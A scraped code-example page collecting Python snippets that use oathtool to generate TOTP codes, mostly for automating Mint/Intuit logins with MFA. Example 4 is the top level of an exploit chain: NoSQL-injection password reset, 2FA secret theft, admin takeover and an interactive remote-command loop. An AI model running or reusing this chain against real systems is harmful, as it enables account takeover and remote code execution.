Exemplo n.º 1
0
    def _run_oathtool(self):
        secret = self._decrypt_totp_config()

        totp = oathtool.generate_otp(secret)  # self.runner.output_string(['oathtool', '--base32', '--totp', secret])
        hashed_totp = sha256(totp.encode()).hexdigest()
        
        return totp, hashed_totp
Exemplo n.º 2
0
def get_otp():
    """ get One Time Password """
    logging.info("OTP取得を開始します。")
    secret_key = MFA_SECRET_NAME
    secret_info = get_secret(secret_key)
    secret = secret_info.get(MFA_SECRET_KEY)
    otp = oathtool.generate_otp(secret)
    logging.info("OTP取得を完了しました。")
    return otp
Exemplo n.º 3
0
#!/usr/bin/python3

import oathtool
import os

facebook_key = os.getenv("FACEBOOK_SECRET_KEY")

facebook_otp = oathtool.generate_otp(facebook_key)
print(f'facebook_otp={facebook_otp}')
Exemplo n.º 4
0
## Getting reset token through blind nosql injection
token = resettoken(target)

## Changing Password
changingpassword(target,token)


# Privilege Escalation to admin
## Getting secret for 2fa
secret = twofactor(target,lowprivmail)


## Sending Reset mail
print(f"[+] Resetting {adminmail} password")
forgotpassword(adminmail,target)

## Getting admin reset token through nosql injection authenticated
token = admin_token(target,lowprivmail)


## Resetting Password
code = oathtool.generate_otp(secret)
changingadminpassword(target,token,code)

## Authenticating and triggering rce

while True:
	cmd = input("CMD:> ")
	code = oathtool.generate_otp(secret)
	rce(target,code,cmd)
Exemplo n.º 5
0
def _nav_to_mint_and_login(webdriver, args, mfa_input_callback=None):
    logger.info('Navigating to Mint homepage.')
    webdriver.get(MINT_HOME)
    webdriver.implicitly_wait(2)

    logger.info('Clicking "Sign in" button.')
    sign_in_button = get_element_by_link_text(webdriver, 'Sign in')
    if not sign_in_button:
        logger.error('Cannot find "Sign in" button on Mint homepage.')
        return False
    sign_in_button.click()
    webdriver.implicitly_wait(2)

    # Mint login is a bit messy. Work through the flow, allowing for any order
    # of interstitials. Exit only when reaching the overview page (indicating
    # the user is logged in) or if the login timeout has been exceeded.
    #
    # For each attempt section, note that the element must both be present AND
    # visible. Mint renders but hides the complete login flow meaning that all
    # elements are always present (but only a subset are visible at any
    # moment).
    login_start_time = datetime.now()
    num_password_attempts = 0
    while not webdriver.current_url.startswith(MINT_OVERVIEW):
        since_start = datetime.now() - login_start_time
        if (args.mint_login_timeout
                and since_start.total_seconds() > args.mint_login_timeout):
            logger.error('Exceeded login timeout')
            return False

        if args.mint_user_will_login:
            logger.info('Mint login to be performed by user.')
            _login_flow_advance(webdriver)
            continue

        userid_input = get_element_by_id(webdriver, 'ius-userid')
        identifier_input = get_element_by_id(webdriver, 'ius-identifier')
        ius_text_input = get_element_by_id(webdriver, 'ius-text-input')
        password_input = get_element_by_id(webdriver, 'ius-password')
        submit_button = get_element_by_id(webdriver, 'ius-sign-in-submit-btn')
        # Password might be asked later in the MFA flow; combine logic here.
        mfa_password_input = get_element_by_id(
            webdriver, 'ius-sign-in-mfa-password-collection-current-password')
        mfa_submit_button = get_element_by_id(
            webdriver, 'ius-sign-in-mfa-password-collection-continue-btn')

        # Attempt to enter an email and/or password if the fields are present.
        do_submit = False
        if is_visible(userid_input):
            userid_input.clear()
            userid_input.send_keys(args.mint_email)
            logger.info('Mint Login Flow: Entering email into "userid" field')
            do_submit = True
        if is_visible(identifier_input):
            identifier_input.clear()
            identifier_input.send_keys(args.mint_email)
            logger.info('Mint Login Flow: Entering email into "id" field')
            do_submit = True
        if is_visible(ius_text_input):
            ius_text_input.clear()
            ius_text_input.send_keys(args.mint_email)
            logger.info('Mint Login Flow: Entering email into "text" field')
            do_submit = True
        if is_visible(password_input):
            num_password_attempts += 1
            password_input.clear()
            password_input.send_keys(args.mint_password)
            logger.info('Mint Login Flow: Entering password')
            do_submit = True
        if is_visible(mfa_password_input):
            num_password_attempts += 1
            mfa_password_input.clear()
            mfa_password_input.send_keys(args.mint_password)
            logger.info('Mint Login Flow: Entering password in MFA input')
            do_submit = True
        if num_password_attempts > _MAX_PASSWORD_ATTEMPTS:
            logger.error('Too many password entries attempted; aborting.')
            return False
        if do_submit:
            if is_visible(submit_button):
                logger.info('Mint Login Flow: Submitting login credentials')
                submit_button.submit()
            elif is_visible(mfa_submit_button):
                logger.info('Mint Login Flow: Submitting credentials for MFA')
                mfa_submit_button.submit()
            _login_flow_advance(webdriver)
            continue

        # Attempt to find the email on the account list page. This is often the
        # case when reusing a webdriver that has session state from a previous
        # run of the tool.
        known_accounts_selector = get_element_by_id(
            webdriver, 'ius-known-accounts-container')
        if is_visible(known_accounts_selector):
            usernames = get_elements_by_class_name(webdriver,
                                                   'ius-option-username')
            found_username = False
            for username in usernames:
                if username.text == args.mint_email:
                    found_username = True
                    logger.info('Mint Login Flow: Selecting username from '
                                'multi-account selector.')
                    username.click()
                    break
            if found_username:
                _login_flow_advance(webdriver)
                continue

            # The provided email is not in the known accounts list. Go through
            # the 'Use a different user ID' flow:
            use_different_account_button = get_element_by_id(
                webdriver, 'ius-known-device-use-a-different-id')
            if not is_visible(use_different_account_button):
                logger.error('Cannot locate the add different account button.')
                return False
            logger.info('Mint Login Flow: Selecting "Different user" from '
                        'multi-account selector.')
            use_different_account_button.click()
            _login_flow_advance(webdriver)
            continue

        # If shown, bypass the "Let's add your current mobile number" modal.
        skip_phone_update_button = get_element_by_id(
            webdriver, 'ius-verified-user-update-btn-skip')
        if is_visible(skip_phone_update_button):
            logger.info(
                'Mint Login Flow: Skipping update user phone number modal.')
            skip_phone_update_button.click()

        # MFA method selector:
        mfa_options_form = get_element_by_id(webdriver, 'ius-mfa-options-form')
        if is_visible(mfa_options_form):
            # Attempt to use the user preferred method, falling back to the
            # first method.
            mfa_method_option = get_element_by_id(
                webdriver,
                'ius-mfa-option-{}'.format(args.mint_mfa_preferred_method))
            if is_visible(mfa_method_option):
                mfa_method_option.click()
                logger.info('Mint Login Flow: Selecting {} MFA method'.format(
                    args.mint_mfa_preferred_method))
            else:
                mfa_method_cards = get_elements_by_class_name(
                    webdriver, 'ius-mfa-card-challenge')
                if mfa_method_cards and len(mfa_method_cards) > 0:
                    mfa_method_cards[0].click()
            mfa_method_submit = get_element_by_id(
                webdriver, 'ius-mfa-options-submit-btn')
            if is_visible(mfa_method_submit):
                logger.info('Mint Login Flow: Submitting MFA method')
                mfa_method_submit.click()

        # MFA OTP Code:
        mfa_code_input = get_element_by_id(webdriver, 'ius-mfa-confirm-code')
        mfa_submit_button = get_element_by_id(webdriver,
                                              'ius-mfa-otp-submit-btn')
        if is_visible(mfa_code_input) and is_visible(mfa_submit_button):
            mfa_code = (mfa_input_callback
                        or input)('Please enter your 6-digit MFA code: ')
            logger.info('Mint Login Flow: Entering MFA OTP code')
            mfa_code_input.send_keys(mfa_code)
            logger.info('Mint Login Flow: Submitting MFA OTP')
            mfa_submit_button.submit()

        # MFA soft token:
        mfa_token_input = get_element_by_id(webdriver, 'ius-mfa-soft-token')
        mfa_token_submit_button = get_element_by_id(
            webdriver, 'ius-mfa-soft-token-submit-btn')
        if is_visible(mfa_token_input) and is_visible(mfa_token_submit_button):
            import oathtool
            logger.info('Mint Login Flow: Generating soft token')
            mfa_code = oathtool.generate_otp(args.mfa_soft_token)
            logger.info('Mint Login Flow: Entering soft token into MFA input')
            mfa_token_input.send_keys(mfa_code)
            logger.info('Mint Login Flow: Submitting soft token MFA')
            mfa_token_submit_button.submit()

        # MFA account selector:
        mfa_select_account = get_element_by_id(
            webdriver, 'ius-mfa-select-account-section')
        mfa_token_submit_button = get_element_by_id(
            webdriver, 'ius-sign-in-mfa-select-account-continue-btn')
        if args.mint_intuit_account and is_visible(mfa_select_account):
            account_input = get_element_by_xpath(
                mfa_select_account, '//label/span[text()=\'{}\']/../'
                'preceding-sibling::input'.format(args.mint_intuit_account))
            if (is_visible(account_input)
                    and is_visible(mfa_token_submit_button)):
                account_input.click()
                mfa_token_submit_button.submit()
                logger.info('Mint Login Flow: MFA account selection')

    # Wait for the token to become available.
    while True:
        since_start = datetime.now() - login_start_time
        if (args.mint_login_timeout
                and since_start.total_seconds() > args.mint_login_timeout):
            logger.error('Exceeded login timeout')
            return False

        try:
            js_user = get_element_by_name(webdriver, 'javascript-user')
            if js_user:
                js_value = js_user.get_attribute('value')
                json_value = json.loads(js_value)
                if 'token' in json_value:
                    # Token is ready; break out.
                    break
        except StaleElementReferenceException:
            logger.warning('Stale reference while getting Mint JS user token')

        _login_flow_advance(webdriver)

    logger.info('Mint login successful.')
    # If you made it here, you must be good to go!
    return True
Exemplo n.º 6
0
def mfa_page(
    driver,
    mfa_method,
    mfa_token,
    mfa_input_callback,
    imap_account,
    imap_password,
    imap_server,
    imap_folder,
):
    # mfa screen
    try:
        if mfa_method == "soft-token":
            mfa_token_input = driver.find_element_by_css_selector(
                "#iux-mfa-soft-token-verification-code, #ius-mfa-soft-token")
            if mfa_input_callback is not None:
                mfa_code = mfa_input_callback(
                    "Please enter your 6-digit MFA code: ")
            else:
                mfa_code = oathtool.generate_otp(mfa_token)
            mfa_token_input.send_keys(mfa_code)
            mfa_token_submit = driver.find_element_by_css_selector(
                '#ius-mfa-soft-token-submit-btn, [data-testid="VerifySoftTokenSubmitButton"]'
            )
            mfa_token_submit.click()
        else:
            try:
                driver.find_element_by_id("ius-mfa-options-form")
                mfa_method_option = driver.find_element_by_id(
                    "ius-mfa-option-{}".format(mfa_method))
                mfa_method_option.click()
                mfa_method_submit = driver.find_element_by_id(
                    "ius-mfa-options-submit-btn")
                mfa_method_submit.click()
            except NoSuchElementException:
                pass  # no option to select mfa option

            if mfa_method == "email" and imap_account:
                for element_id in [
                        "ius-label-mfa-email-otp",
                        "ius-mfa-email-otp-card-challenge",
                        "ius-sublabel-mfa-email-otp",
                ]:
                    try:
                        mfa_email_select = driver.find_element_by_id(
                            element_id)
                        mfa_email_select.click()
                        break
                    except (
                            NoSuchElementException,
                            ElementNotInteractableException,
                    ):
                        pass  # no option to select email address

            if mfa_method == "sms":
                try:
                    mfa_sms_select = driver.find_element_by_id(
                        "ius-mfa-sms-otp-card-challenge")
                    mfa_sms_select.click()
                except (NoSuchElementException,
                        ElementNotInteractableException):
                    pass  # no option to select sms

            try:
                mfa_code_input = driver.find_element_by_id(
                    "ius-mfa-confirm-code")
                mfa_code_input.clear()
                if mfa_method == "email" and imap_account:
                    mfa_code = get_email_code(
                        imap_account,
                        imap_password,
                        imap_server,
                        imap_folder=imap_folder,
                    )
                else:
                    mfa_code = (mfa_input_callback or
                                input)("Please enter your 6-digit MFA code: ")
                mfa_code_input.send_keys(mfa_code)

                mfa_code_submit = driver.find_element_by_css_selector(
                    '#ius-mfa-otp-submit-btn, [data-testid="VerifyOtpSubmitButton"]'
                )
                mfa_code_submit.click()
            except (NoSuchElementException, ElementNotInteractableException):
                pass  # we're not on mfa input screen

    except NoSuchElementException:
        pass  # not on mfa screen
Exemplo n.º 7
0
def sign_in(
    email,
    password,
    driver,
    mfa_method=None,
    mfa_token=None,
    mfa_input_callback=None,
    intuit_account=None,
    wait_for_sync=True,
    wait_for_sync_timeout=5 * 60,
    imap_account=None,
    imap_password=None,
    imap_server=None,
    imap_folder="INBOX",
):
    """
    Takes in a web driver and gets it through the Mint sign in process
    """
    driver.implicitly_wait(20)  # seconds
    driver.get("https://www.mint.com")
    element = driver.find_element_by_link_text("Sign in")
    element.click()

    WebDriverWait(driver, 20).until(
        expected_conditions.presence_of_element_located((
            By.CSS_SELECTOR,
            "#ius-link-use-a-different-id-known-device, #ius-userid, #ius-identifier, #ius-option-username",
        )))
    driver.implicitly_wait(0)  # seconds

    # click "Use a different user ID" if needed
    try:
        driver.find_element_by_id(
            "ius-link-use-a-different-id-known-device").click()
        WebDriverWait(driver, 20).until(
            expected_conditions.presence_of_element_located(
                (By.CSS_SELECTOR,
                 "#ius-userid, #ius-identifier, #ius-option-username")))
    except NoSuchElementException:
        pass

    try:  # try to enter in credentials if username and password are on same page
        email_input = driver.find_element_by_id("ius-userid")
        if not email_input.is_displayed():
            raise ElementNotVisibleException()
        email_input.clear()  # clear email and user specified email
        email_input.send_keys(email)
        driver.find_element_by_id("ius-password").send_keys(password)
        driver.find_element_by_id("ius-sign-in-submit-btn").submit()
    # try to enter in credentials if username and password are on different pages
    except (ElementNotInteractableException, ElementNotVisibleException):
        try:
            email_input = driver.find_element_by_id("ius-identifier")
            if not email_input.is_displayed():
                raise ElementNotVisibleException()
            email_input.clear()  # clear email and use specified email
            email_input.send_keys(email)
            driver.find_element_by_id("ius-sign-in-submit-btn").click()
        # click on username if on the saved usernames page
        except (ElementNotInteractableException, ElementNotVisibleException):
            username_elements = driver.find_elements_by_class_name(
                "ius-option-username")
            for username_element in username_elements:
                if username_element.text == email:
                    username_element.click()
                    break
        driver.implicitly_wait(20)  # seconds
        try:
            driver.find_element_by_id(
                "ius-sign-in-mfa-password-collection-current-password"
            ).send_keys(password)
            driver.find_element_by_id(
                "ius-sign-in-mfa-password-collection-continue-btn").submit()
        except NoSuchElementException:
            pass  # password may not be here when using MFA

    # Wait until logged in, just in case we need to deal with MFA.
    driver.implicitly_wait(1)  # seconds
    while not driver.current_url.startswith(
            "https://mint.intuit.com/overview.event"):

        # bypass "Let's add your current mobile number" interstitial page
        try:
            skip_for_now = driver.find_element_by_id(
                "ius-verified-user-update-btn-skip")
            skip_for_now.click()
        except (
                NoSuchElementException,
                StaleElementReferenceException,
                ElementNotVisibleException,
        ):
            pass

        # mfa screen
        try:
            if mfa_method == "soft-token":
                mfa_token_input = driver.find_element_by_css_selector(
                    "#iux-mfa-soft-token-verification-code, #ius-mfa-soft-token"
                )
                if mfa_input_callback is not None:
                    mfa_code = mfa_input_callback(
                        "Please enter your 6-digit MFA code: ")
                else:
                    mfa_code = oathtool.generate_otp(mfa_token)
                mfa_token_input.send_keys(mfa_code)
                mfa_token_submit = driver.find_element_by_css_selector(
                    '#ius-mfa-soft-token-submit-btn, [data-testid="VerifySoftTokenSubmitButton"]'
                )
                mfa_token_submit.click()
            else:
                try:
                    driver.find_element_by_id("ius-mfa-options-form")
                    mfa_method_option = driver.find_element_by_id(
                        "ius-mfa-option-{}".format(mfa_method))
                    mfa_method_option.click()
                    mfa_method_submit = driver.find_element_by_id(
                        "ius-mfa-options-submit-btn")
                    mfa_method_submit.click()
                except NoSuchElementException:
                    pass  # no option to select mfa option

                if mfa_method == "email" and imap_account:
                    for element_id in [
                            "ius-label-mfa-email-otp",
                            "ius-mfa-email-otp-card-challenge",
                            "ius-sublabel-mfa-email-otp",
                    ]:
                        try:
                            mfa_email_select = driver.find_element_by_id(
                                element_id)
                            mfa_email_select.click()
                            break
                        except (
                                NoSuchElementException,
                                ElementNotInteractableException,
                        ):
                            pass  # no option to select email address

                if mfa_method == "sms":
                    try:
                        mfa_sms_select = driver.find_element_by_id(
                            "ius-mfa-sms-otp-card-challenge")
                        mfa_sms_select.click()
                    except (NoSuchElementException,
                            ElementNotInteractableException):
                        pass  # no option to select sms

                try:
                    mfa_code_input = driver.find_element_by_id(
                        "ius-mfa-confirm-code")
                    mfa_code_input.clear()
                    if mfa_method == "email" and imap_account:
                        mfa_code = get_email_code(
                            imap_account,
                            imap_password,
                            imap_server,
                            imap_folder=imap_folder,
                        )
                    else:
                        mfa_code = (
                            mfa_input_callback
                            or input)("Please enter your 6-digit MFA code: ")
                    mfa_code_input.send_keys(mfa_code)

                    mfa_code_submit = driver.find_element_by_css_selector(
                        '#ius-mfa-otp-submit-btn, [data-testid="VerifyOtpSubmitButton"]'
                    )
                    mfa_code_submit.click()
                except (NoSuchElementException,
                        ElementNotInteractableException):
                    pass  # we're not on mfa input screen

        except NoSuchElementException:
            pass  # not on mfa screen

        # account selection screen -- if there are multiple accounts, select one
        try:
            select_account = driver.find_element_by_id(
                "ius-mfa-select-account-section")
            if intuit_account is not None:
                account_input = select_account.find_element_by_xpath(
                    "//label/span[text()='{}']/../preceding-sibling::input".
                    format(intuit_account))
                account_input.click()

            mfa_code_submit = driver.find_element_by_css_selector(
                '#ius-sign-in-mfa-select-account-continue-btn, [data-testid="SelectAccountContinueButton"]'
            )
            mfa_code_submit.click()
        except NoSuchElementException:
            pass  # not on account selection screen

        # password only sometimes after mfa
        try:
            driver.find_element_by_id(
                "ius-sign-in-mfa-password-collection-current-password"
            ).send_keys(password)
            driver.find_element_by_id(
                "ius-sign-in-mfa-password-collection-continue-btn").submit()
            time.sleep(2)
        except (NoSuchElementException, ElementNotInteractableException,
                StaleElementReferenceException):
            pass  # not on secondary mfa password screen
    driver.implicitly_wait(20)  # seconds

    # Wait until the overview page has actually loaded, and if wait_for_sync==True, sync has completed.
    status_message = None
    if wait_for_sync:
        try:
            # Status message might not be present straight away. Seems to be due
            # to dynamic content (client side rendering).
            status_web_element = WebDriverWait(driver, 30).until(
                expected_conditions.visibility_of_element_located(
                    (By.CSS_SELECTOR, ".SummaryView .message")))
            WebDriverWait(driver, wait_for_sync_timeout).until(
                lambda x: "Account refresh complete" in status_web_element.
                get_attribute("innerHTML"))
            status_message = status_web_element.text
        except (TimeoutException, StaleElementReferenceException):
            logger.warning("Mint sync apparently incomplete after timeout. "
                           "Data retrieved may not be current.")
    return status_message, get_token(driver)